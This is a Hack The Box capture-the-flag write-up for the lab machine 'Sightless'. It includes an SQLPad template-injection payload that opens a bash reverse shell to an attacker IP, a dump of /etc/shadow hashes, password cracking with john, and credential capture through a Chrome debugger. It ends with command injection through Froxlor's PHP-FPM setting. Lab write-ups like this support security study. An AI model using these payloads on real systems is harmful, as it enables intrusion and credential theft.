Hackthebox: Sightless

Overview

Sightless is an easy-difficulty Hack The Box machine dealing initially with Remote Code Execution from an SQLPad subdomain -> /etc/shadow abuse to read and crack user hashes -> Chrome Debugger abuse to read passwords from monitoring process -> RCE using command injection to get our root flag.

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.231.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-11 10:13 W. Central Africa Standard Time
Nmap scan report for 10.129.231.103
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.231.103]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=1/11%Time=6782365D%P=i686-pc-windows-windows%r(
SF:GenericLines,A3,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x2
SF:0Server\)\x20\[::ffff:10\.129\.231\.103\]\r\n500\x20Invalid\x20command:
SF:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20t
SF:ry\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.27 seconds

We can see that we have ssh, ftp and http ports accessible. Both ftp and http are redirecting us towards the domain name of sightless.htb => so let’s go ahead and add that entry to our /etc/hosts file!

Web Application - http://sightless.htb

This website doesn’t seem to have anything special, scrolling a bit down we can see a few of the offered services:

Some common mistakes developers make when dealing with a subdomain that shouldn’t be disclosed yet (still in prod), is to name the subdomain after the feature. Let’s try to add those words [“SQLPad”,”Froxlor”] to our wordlist and check for available subdomains:

And yes! We got access to an SQLPad subdomain.

Searching the mighty web for some exploits related to SQLPad panel, I stumbled into this report from https://huntr.com

It’s a Remote Code Execution vulnerability in the SQLPad panel when trying to add a new MySQL connection to the database. Lessdoit !

This will be our payload:

{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.x.x/4444 0>&1"') }}

And we get a callback:

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.231.103] 47218
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)
root@c184118df0a6:/var/lib/sqlpad#

However, this is only a docker container.

User Pivoting - Michael

Doing my usual checks, I found out that I could read the /etc/shadow file (which contains users password hashes):

root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
root@c184118df0a6:/var/lib/sqlpad#

We can see that there is a michael user. Let’s get his hash and try to crack it:

┌──(kali㉿kali)-[~]
└─$ john  -w=/usr/share/wordlists/rockyou.txt hash                
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
insaneclownposse (?)     
1g 0:00:00:17 DONE (2025-01-11 11:01) 0.05672g/s 3325p/s 3325c/s 3325C/s kruimel..galati
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ cat hash                                              
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/
                                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 

And michael’s password is insaneclownposse. Let’s try to connect to the main machine using it and get our user flag:

michael@sightless:~$ cat user.txt
71febbb47666ca******************
michael@sightless:~$

Privilege Escalation - Chrome Remote Debugger to RCE

Checking our connection on the machine for any machine running in the background, we find some interesting ports:

michael@sightless:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:33011         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:43425         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:37621         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:42634         127.0.0.1:37621         ESTABLISHED off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:53488         ESTABLISHED keepalive (7194.60/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:56136         TIME_WAIT   timewait (13.28/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:43552         TIME_WAIT   timewait (54.60/0/0)
tcp        0    232 10.129.231.103:22       10.10.x.x:30607        ESTABLISHED on (0.32/0/0)
tcp        0      0 127.0.0.1:50152         127.0.0.1:43425         ESTABLISHED keepalive (28.62/0/0)
tcp        0      0 127.0.0.1:43425         127.0.0.1:50152         ESTABLISHED keepalive (28.62/0/0)
tcp        0      0 127.0.0.1:53492         127.0.0.1:8080          TIME_WAIT   timewait (55.57/0/0)
tcp        0      0 127.0.0.1:37621         127.0.0.1:42634         ESTABLISHED keepalive (24.28/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:35154         TIME_WAIT   timewait (39.10/0/0)
tcp        0      1 10.129.231.103:46100    8.8.8.8:53              SYN_SENT    on (1.39/1/0)
tcp        0      0 127.0.0.1:53488         127.0.0.1:8080          ESTABLISHED keepalive (39.60/0/0)
tcp        0      0 127.0.0.1:50154         127.0.0.1:43425         ESTABLISHED keepalive (8.83/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:35014         TIME_WAIT   timewait (8.02/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:34976         TIME_WAIT   timewait (23.62/0/0)
tcp        0      0 127.0.0.1:43425         127.0.0.1:50154         ESTABLISHED keepalive (8.88/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::21                   :::*                    LISTEN      off (0.00/0/0)
michael@sightless:~$

We can see that Froxlor is running on port 8080 (we already saw on the first website).
But we could also see that the machine is utilizing Chrome Drivers, that’s what made me think of this article
What we’ll do now is forward the 8080 port alongside any other weird-looking port (except 2-digit ports), because those are the ports used by the chrome driver:

PS C:\Users\0xkujen> ssh  -L 8080:sightless.htb:8080 -L 42634:sightless.htb:42634 -L 34956:localhost:34956 -L 50152:localhost:50152 -L 43425:localhost:43425 -L 37621:localhost:37621 -L 50154:localhost:50154 -L 43425:localhost:43425 [email protected]
[email protected]'s password:
bind [127.0.0.1]:42634: Permission denied
channel_setup_fwd_listener_tcpip: cannot listen to port: 42634
bind [127.0.0.1]:43425: Permission denied
channel_setup_fwd_listener_tcpip: cannot listen to port: 43425
Last login: Sat Jan 11 10:20:21 2025 from 10.10.x.x
michael@sightless:~$

(ports change so make sure to update them)
Next, we’ll open Google Chrome and navigate to chrome://inspect/#devices. Add each port as localhost: in the Configure tab until we see a connection appear. Then click on “Inspect” to open a new window where we switch to the “Network” tab and wait for Michael to log in and monitor the traffic.
In index.php we’ll find the credentials required to access the login portal on localhost:8080:

admin:ForlorfroxAdmin

And we’re in:

RCE to root using the PHP-FPM package

Checking the PHP packages we see that there’s a package restart command that we’re able to alter:

Let’s copy our root flag to /tmp and change it’s permissions. Everytime we change the command we should disable it and re-enable it from http://admin.sightless.htb:8080/admin_settings.php?page=overview&part=phpfpm:

Then disable and enable again:

michael@sightless:~$ ls /tmp
Crashpad
root.txt
systemd-private-b0a4883901934c469b86c2105ddc6b4d-apache2.service-LPF8fp
systemd-private-b0a4883901934c469b86c2105ddc6b4d-ModemManager.service-CnBX3D
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-logind.service-NqNnkU
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-resolved.service-PJrWDg
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-timesyncd.service-AUiPUV
vmware-root_790-2965972456
michael@sightless:~$

Do the same thing to add read permissions to it, and get our root flag:

michael@sightless:/tmp$ cat root.txt
98109e1ce28830******************
michael@sightless:/tmp$